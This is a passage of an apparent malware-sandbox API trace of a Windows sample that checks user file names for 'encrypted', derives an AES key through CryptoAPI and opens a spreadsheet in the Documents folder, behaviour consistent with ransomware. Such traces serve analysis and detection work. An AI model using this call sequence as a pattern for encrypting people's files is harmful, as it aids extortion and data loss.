lpString1="Ne5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.818] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.818] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.818] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x573ff8b0, ftLastWriteTime.dwHighDateTime=0x1d5b0bf, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 0x7c2100 [0036.819] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.819] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.819] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.819] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.819] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.819] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.819] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.819] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.820] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0036.820] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.820] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.820] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.820] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.821] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.821] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.821] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.821] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.822] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.822] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.822] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.822] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.822] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.822] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.823] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.823] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.823] CryptHashData (hHash=0x7c2240, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.823] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.823] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.823] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.824] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0036.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.824] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.824] CryptDestroyHash (hHash=0x7c2240) returned 1 [0036.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0036.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmd_cmune5hcq1ezk.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.824] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.824] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0036.826] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 